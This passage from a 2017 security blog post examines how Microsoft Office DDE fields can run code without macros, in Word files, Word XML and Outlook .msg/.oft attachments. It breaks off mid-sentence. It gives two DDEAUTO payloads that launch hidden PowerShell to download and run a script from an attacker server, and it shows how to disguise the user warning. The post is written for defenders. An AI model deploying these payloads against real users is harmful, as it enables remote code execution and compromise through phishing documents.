www.securitysift.com - Security Sift | Sifting through the world of Information Security, one bit at a time
Site Description
Sifting through the world of Information Security, one bit at a time
Example Site Content
Abusing Microsoft Office DDE
Written by: Mike Czumak
Written on: October 23, 2017

Introduction

Earlier this month I came across a post by the team at SensePost outlining their macro-less code execution technique using the antiquated DDE feature of Microsoft Word. As you may be aware, this feature has existed in Office for many years and was even written about over 15 years ago as a potential threat vector. Old or not, as we continue to put up obstacles in front of malicious actors in the form of disabling macros and other code execution restrictions, attacks are going to adapt and use whatever works, regardless of age, so I saw this as a viable vector worth exploring further. I'm always interested in testing these types of techniques so I can better understand how to protect an enterprise from such attacks, and while I have posted some findings sporadically to Twitter, I wanted to better centralize my results. What follows is a synopsis of my test notes.

Testing in Word

The team at SensePost did a good job of outlining the technique in Word and I won't rehash their notes, so if you're not familiar, I encourage you to check out the link in the Introduction.

Modifying the user warning

If you are familiar, you'll know that simply opening a Word document with a DDEAUTO field is enough to execute it, though the user will be presented with several prompts, the first two of which must be answered "Yes" for execution to succeed.

The first prompt is generic and simply reads as follows:

The second prompt actually incorporates portions of the DDEAUTO command and therefore could make a more discerning user a bit suspicious, depending on what is being executed (in the below case, just Calc.exe).

One of the things that piqued my interest in the SensePost article was the following statement:

"The second prompt asks the user whether or not they want to execute the specified application. Now this can be considered as a security warning since it asks the user to execute "cmd.exe"; however, with proper syntax modification it can be hidden."

I began modifying the syntax and, using their example of executing a remote PowerShell script, went from this:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "}

to this:

{ DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://[evil_ip]/shell.txt');powershell $e # " "for security reasons"}

Aside from opting to call PowerShell directly, the key difference here is the directory manipulation and the message verbiage added as the second parameter of the DDEAUTO command, which results in a potentially more convincing prompt:

It wasn't long before this technique was being observed in the wild: https://twitter.com/GossiTheDog/status/919686197047451653

Finding vulnerable file types

If you're responsible for the security of an organization/enterprise, you know that file types can make all the difference when determining whether your detection and prevention solutions are adequate. For example, maybe you sandbox email attachments, and that technology may do a good job scanning .doc or .docx, but what about Word XML?

Turns out, as long as Word is set as the default parser, the following file types can all be used as a vector: doc(x/m), dot(x/m), rtf, and Word xml. I'll post the prevention steps at the end of this article, but note that if for whatever reason you cannot apply those registry settings (or you don't manage all of the workstations in your environment), you should consider how else you might detect/prevent DDE should it come in via any of the above file types. Also note that Word files can be embedded in other Office documents (Publisher, PowerPoint, etc.), so it's not always as straightforward as identifying these particular file types in email attachments.

Testing in Outlook

While Word was presented as the threat vector by SensePost, I was also curious about Outlook file types as these could be much harder to detect. Since Outlook uses Word as its native parser, I found that attaching a draft message (.msg) or template (.oft) file would also execute the DDE should a user open that attachment:

While certainly important to know (are you scanning all .msg attachments as they come into your environment?), I was mor